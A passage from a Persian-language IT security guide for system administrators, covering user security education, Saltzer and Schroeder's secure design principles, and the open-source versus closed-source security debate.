‫ﺗﻬﺪﻳﺪﻛﻨﻨﺪﻩ ﺑﻮﺩ‪ .‬ﺑﺎ ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺧﻄﺮﺍﺕ ﻣﻮﺟﻮﺩ ﻭ ﺍﻳﻨﻜﻪ ﻫﻤﻜﺎﺭﻱ ﺁﻧﺎﻥ ﭼﻘﺪﺭ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺧﻨﺜﻲﺳﺎﺯﻱ ﺧﻄﺮﺍﺕ ﻛﻤﻚ ﻛﻨـﺪ‪،‬‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ‪ .‬ﺑﺎ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﺓ ﺻﺤﻴﺢ ﺩﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺗﺠﺎﺭﺏ ﻣﻮﻓﻖ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺑﺨـﺸﻲ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻡ‬
‫ﺍﻣﻨﻴﺘﻲ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺁﻣﻮﺯﺵ ﻭ ﺍﻧﮕﻴﺰﺵ ﺑﻬﺘﺮ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﺧﻮﺏ ﻧﺘﻴﺠﻪ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺎ ﻫﻢ ﺍﻋﻤﺎﻝ ﺷﻮﻧﺪ‪ .‬ﺁﻣﻮﺯﺵ ﺑﺪﻭﻥ ﺍﻧﮕﻴﺰﺵ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﻪ‬
‫ﺁﻥ ﻣﻔﻬﻮﻡ ﺑﺎﺷﺪ ﻛﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻋﻤﻞ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻩﺍﻧﺪ ﻭ ﺍﻧﮕﻴﺰﺵ ﺑﺪﻭﻥ ﺁﻣﻮﺯﺵ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﻛﺎﺭﻫﺎﻱ‬
‫ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ‪ ،‬ﺷﻜﺎﻑ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪28‬‬ ‫‪Shadow Password Files‬‬


‫‪٢٦٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﺩﻭﻡ‬
‫ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﻳﻚ ﺗﻌﺮﻳﻒ ﻋﻤﻠﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳﻲ ﺍﺭﺍﺋﻪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ ﺑﺤﺚ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ‬
‫ﻛﻪ ﭼﻪ ﻛﺴﻲ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺣﻤﻠﻪ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺘﺪﺍﻭﻝ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﺑﺮ ﻣﻲﺷﻤﺎﺭﺩ ﻭ ﻣﻄﺎﻟﻌﺔ ﻣﻮﺭﺩﻱ ﻳﻚ ﻧﻤﻮﻧﻪ‬
‫ﺣﻤﻠﻪ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ‪.‬‬

‫ﺍﻣﻨﻴﺖ ﻭ ﺭﺍﻫﺒﺮﺍﻥ‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﻫﺒﺮ ﻓﻨﻲ‪ ،‬ﺷﻤﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺍﺭﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﻴﺪ ﻫﻤﺎﻧﻄﻮﺭ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺑﺎﻳـﺪ ﻛـﺎﺭ‬
‫ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﻜﻪ ﺗﻌﺎﺭﻳﻒ ﺭﺳﻤﻲ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻳﻚ ﺗﻌﺮﻳﻒ ﻋﻤﻠﻲ ﻣﻔﻴـﺪ ﺑـﺮﺍﻱ ﺭﺍﻫﺒـﺮﺍﻥ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﺍﻳﻨﻜـﻪ‪" :‬ﻳـﻚ‬
‫ﻛﺎﻣﭙﻴﻮﺗﺮ ﺩﺭﺻﻮﺭﺗﻲ ﺍﻳﻤﻦ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﻪ ﺁﻥ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﺵ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ ﻛﻪ ﺁﻧﻄﻮﺭ ﺭﻓﺘﺎﺭ ﻛﻨﻨﺪ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻭﺩ"‪.‬‬
‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﻣﺮﻭﺯ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻛﺮﺩﻩﺍﻳﺪ ﺗﺎ ﭼﻨﺪ ﻫﻔﺘﻪ ﺩﺭ ﺁﻥ ﺑﻤﺎﻧﺪ ﻭ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻲ ﻛﻪ ﻧﺒﺎﻳﺪ ﺁﻥ ﺭﺍ ﺑﺨﻮﺍﻧﻨﺪ ﻫﻤﭽﻨﺎﻥ ﻧﺎﺧﻮﺍﻧـﺪﻩ ﺑﻤﺎﻧـﺪ‪،‬‬
‫ﺁﻧﮕﺎﻩ ﺭﺍﻳﺎﻧﻪ ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﻣﻨﻴﺖ ﻳﻚ ﻭﻇﻴﻔﺔ ﺣﺴﺎﺱ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﻧﻘﺸﻬﺎﻱ ﻳﻚ ﺭﺍﻫﺒﺮ ﺍﺳﺖ‪ .‬ﺑـﺎ ﺍﻳـﻦ ﺗﻌﺮﻳـﻒ‪ ،‬ﻓﺎﺟﻌـﻪﻫـﺎﻱ‬
‫ﻃﺒﻴﻌﻲ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺷﻜﺎﻝﺩﺍﺭ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺗﻬﺪﻳﺪ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ‪.‬‬

‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺿﻌﻴﻒ ﻧﻮﺷﺘﻪ ﺷﺪﻩ‬


‫ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻳﻤﻦ ﺁﺳﺎﻥ ﻧﻴﺴﺖ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ،۱۹۷۵‬ﺟﺮﻭﻡ ﺳﺎﻟﺰﺭ‪ ٢٩‬ﻭ ﺍﻡ‪ .‬ﺩﻱ‪ .‬ﺷـﺮﻭﺩﺭ‪ ،٣٠‬ﻫﻔـﺖ ﻣﻌﻴـﺎﺭ ﺑـﺮﺍﻱ‬
‫ﺑﻨﺎﻱ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺗﻌﺮﻳﻒ ﻛﺮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺣﺪﺍﻗﻠﻲ‬
‫ﻫﺮ ﻛﺎﺭﺑﺮ ﻭ ﻓﺮﺁﻳﻨﺪﻱ ﺑﺎﻳﺪ ﺍﺯ ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ‪ .‬ﺩﺳﺘﺮﺳﻲ ﺣﺪﺍﻗﻠﻲ ﺧﺴﺎﺭﺍﺗﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﻴﻦ ﺑـﺪﺧﻮﺍﻩ‬
‫ﻭ ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺗﻮﺳﻂ ﺧﻄﺎﻫﺎ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﺠﺎﻱ ﺁﻧﻜﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﻮﻧﺪ‪،‬‬
‫ﺑﺎﻳﺪ ﺻﺮﺍﺣﺘﹰﺎ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻻﺯﻡ ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﻪ ﺁﻧﻬﺎ ﺍﺧﺘﺼﺎﺹ ﻳﺎﺑﻨﺪ‪.‬‬

‫ﻣﻜﺎﻧﻴﺰﻡ ﺍﻗﺘﺼﺎﺩﻱ‬
‫ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﻛﻮﭼﻚ ﻭ ﺳﺎﺩﻩ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻭ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩ‪.‬‬

‫ﻣﻴﺎﻧﺠﻴﮕﺮﻱ ﻛﺎﻣﻞ‬
‫ﻫﺮ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺩﺍﺷﺘﻦ ﻣﺠﻮﺯ ﺻﺤﻴﺢ ﻛﻨﺘﺮﻝ ﺷﻮﺩ‪.‬‬

‫‪29‬‬ ‫‪Jerome Saltzer‬‬


‫‪30‬‬ ‫‪M. D. Schroder‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٦٦‬‬

‫ﻃﺮﺍﺣﻲ ﺑﺎﺯ‬
‫‪٣١‬‬
‫ﺍﻳﻤﻨﻲ ﻧﺒﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺟﻬﻞ ﻣﻬﺎﺟﻢ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺿﺎﺑﻄﻪ ﺍﺯ ﻭﺟﻮﺩ ﺩﺭﺏ ﻣﺨﻔﻲ ﺳﻴﺴﺘﻢ ﻛﻪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺁﻧـﺮﺍ ﻣـﻲﺷﻨﺎﺳـﻨﺪ‬
‫ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﻲﺩﻫﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﺪ‪.‬‬

‫ﺟﺪﺍﺳﺎﺯﻱ ﺩﺳﺘﺮﺳﻴﻬﺎ‬
‫ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﻪ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺷﺮﻁ ﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬

‫ﺣﺪﺍﻗﻞ ﻣﻜﺎﻧﻴﺰﻡ ﻣﺸﺘﺮﻙ‬


‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺳﻴﺴﺘﻢ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺟﺪﺍ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ‪ ،‬ﻫﻢ ﻛﻨﺘﺮﻝ ﻣﺨﻔﻴﺎﻧﻪ ﻭ ﻫﻢ ﺗﻼﺷﻬﺎﻱ ﻣـﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﻏﻠﺒـﻪ ﺑـﺮ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ‪.‬‬

‫ﭘﺬﻳﺮﺵ ﺭﻭﺍﻧﻲ‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺩﺭ ﻛﺎﺭﺑﺮﺩ ﺁﺳﺎﻥ ﺑﺎﺷﻨﺪ ﺗﺎ ﺩﺭ ﻋﻤﻞ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ﻭ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺘﻪ ﻧﺸﻮﻧﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻃﺮﺍﺣﺎﻥ ﻫﻴﭽﮕﺎﻩ ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﺭﺍ ﻳﺎﺩ ﻧﻤﻲﮔﻴﺮﻧﺪ‪ ،‬ﺍﮔﺮ ﻫﻢ ﻳﺎﺩ ﺑﮕﻴﺮﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻳﺎﺩ ﻣﻲﺑﺮﻧﺪ‪ ،‬ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﻣﻴﺎﻧﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻳﺎ‬
‫ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﻣﻲﺭﺳﻨﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺁﻧﻘﺪﺭ ﺍﻫﻤﻴﺖ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭﮔﻴﺮ ﺁﻥ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ‪ ،‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻓﺮﺍﻭﺍﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻃﺮﺍﺣﻲ ﻧﺎﻗﺺ ﺩﺍﺭﻧﺪ ﻭﻟﻲ ﺩﺭ ﺳﻄﺢ ﻭﺳﻴﻌﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻭ ﻣـﺪﻋﻲ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺨﺸﻲ ﺍﺯ ﺯﻳﺮﺑﻨﺎﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ‪ .‬ﻃﺮﺍﺣﻲ ﻧﺎﻣﻨﺎﺳﺐ ﻣﻨﺠﺮ ﺑﻪ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﻭ ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ ﻣﻲﺷﻮﺩ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺗﺼﺎﺩﻓﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺷﻮﺩ ﻭ ﻳﺎ ﻋﺎﻣﺪﺍﻧﻪ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬـﺎﺟﻢ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺑﮕﻴﺮﺩ‪.‬‬

‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ﺩﺭ ﻣﻘﺎﺑﻞ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺧﺘﺼﺎﺻﻲ‬


‫ﻳﻜﻲ ﺍﺯ ﻣﺒﺎﺣﺚ ﺑﺤﺚ ﺑﺮﺍﻧﮕﻴﺰﺗﺮ ﺩﺭ ﻃﺮﺍﺣﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺁﻳﺎ ﻓﺮﺍﻳﻨﺪﻫﺎﻱ ﺗﻮﺳﻌﻪﺍﻱ ﻛﻪ ﺁﺯﺍﺩﺍﻧﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ‪ ،‬ﺗﻐﻴﻴﺮ‪،‬‬
‫ﻭ ﺗﻮﺯﻳﻊ ﻣﺠﺪﺩ )"ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ" ﻳﺎ "ﻣﺘﻦﺑﺎﺯ"( ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﺑﻪ ﺩﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﺧﺘـﺼﺎﺻﻲ‬
‫)"ﻣﺘﻦﺑﺴﺘﻪ"( ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫ﺍﺯ ﻳﻚ ﻃﺮﻑ ﺍﮔﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ﻛﺎﺭ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﺩﺭ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﺍﺷﻜﺎﻻﺕ ﻗﺎﺑﻞ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺑﺮﻧﺎﻣـﻪ ﺑـﺎ‬
‫ﺧﻮﺍﻧﺪﻥ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍﺣﺖﺗﺮ ﻣﻲﻛﻨﺪ‪ .‬ﭼﻮﻥ ﻃﺒﻘﺎﺕ ﻣﺘﺪﺍﻭﻝ ﻓﺮﺍﻭﺍﻧﻲ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻣﻲﺷﻮﺩ‪،‬‬
‫ﺣﺘﻲ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺤﻠﻴﻞ ﺧﻮﺩﻛﺎﺭ ﺳﭙﺮﺩ ﺗﺎ ﻣـﺸﻜﻼﺕ ﺭﺍ ﺁﺷـﻜﺎﺭ ﻛﻨﻨـﺪ‪ .‬ﻣـﺸﻜﻼﺕ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﻣﺘﻦﺑﺎﺯ ﻋﻤﺪﺗﹰﺎ ﭘﻴﺪﺍ ﺷﺪﻩﺍﻧﺪ ﻭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺴﺘﻪ ﻋـﻼﺝ ﺩﺭﺩ ﻧﻴـﺴﺖ‪ .‬ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ "ﻣﻬﻨﺪﺳـﻲ ﻣﻌﻜـﻮﺱ" ﻧﻤـﻮﺩ ﻳـﺎ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﺭﺯﻳﺎﺑﻲ ﺟﻌﺒﻪ ﺳﻴﺎﻩ‪ ٣٢‬ﺑﺮﻧﺎﻣﻪ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ﺗـﺸﺨﻴﺺ ﺩﺍﺩﻩ ﺷـﻮﻧﺪ‪ .‬ﺑـﺪﻳﻬﻲ‬
‫ﻼ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ )‪ ٣٣(IIS‬ﻧﺘﻮﺍﻧﺴﺘﻪ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻬـﺎﺟﻤﻴﻦ ﺍﺯ‬‫ﺍﺳﺖ ﻋﺪﻡ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﺘﻦ ﻣﺜ ﹰ‬
‫ﻼ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺗﻌﺪﺍﺩ ﺑﻴﺸﺘﺮﻱ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﮔـﺰﺍﺭﺵ ﺷـﺪﻩ ﻧـﺴﺒﺖ ﺑـﻪ ﻣـﺜ ﹰ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭﺏ ﺁﭘﺎﭼﻲ‪ - ٣٤‬ﻛﻪ ﻣﺘﻦ ﺁﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﺍﺳﺖ ‪ -‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﻣﺘﻦﺑﺎﺯ‪ ،‬ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺸﻜﻼﺕ ﻭ ﺭﺍﻩﺣﻞ ﺁﻧﻬـﺎ ﺭﺍ ﻗﺒـﻞ ﺍﺯ ﻣﻬـﺎﺟﻤﻴﻦ ﭘﻴـﺪﺍ ﻛﻨﻨـﺪ ﻭ ﭘـﻴﺶ ﺍﺯ ﻫـﺮ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﺍﻱ ﺁﻧﻬﺎ ﺭﺍ ﻣﻨﺘﺸﺮ ﺳﺎﺯﻧﺪ‪ .‬ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ OpenBSD‬ﻛﻪ ﻳـﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺁﺯﺍﺩ ﺍﺳـﺖ‪ ،‬ﺩﺭ ﺳـﻄﺢ ﻭﺳـﻴﻌﻲ ﺑﻌﻨـﻮﺍﻥ ﻳﻜـﻲ ﺍﺯ‬

‫‪31‬‬ ‫‪Backdoor‬‬
‫‪32‬‬ ‫‪Blackbox Testing‬‬
‫‪33‬‬ ‫‪Microsoft Internet Information Server‬‬
‫‪34‬‬ ‫‪Apache Web Server‬‬
‫‪٢٦٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻝ ﺣﺎﺿﺮ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻋﻤﺪﺗﹰﺎ ﺑﻪ ﺩﻟﻴﻞ ﺍﻳﻨﻜﻪ ﻫﺮ ﺧﻂ ﺍﺯ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻫﺴﺘﺔ ﺍﺻـﻠﻲ‪ ،٣٥‬ﺗﻮﺳـﻂ‬‫ﺍﻳﻤﻦﺗﺮﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺣﺎ ﹺ‬
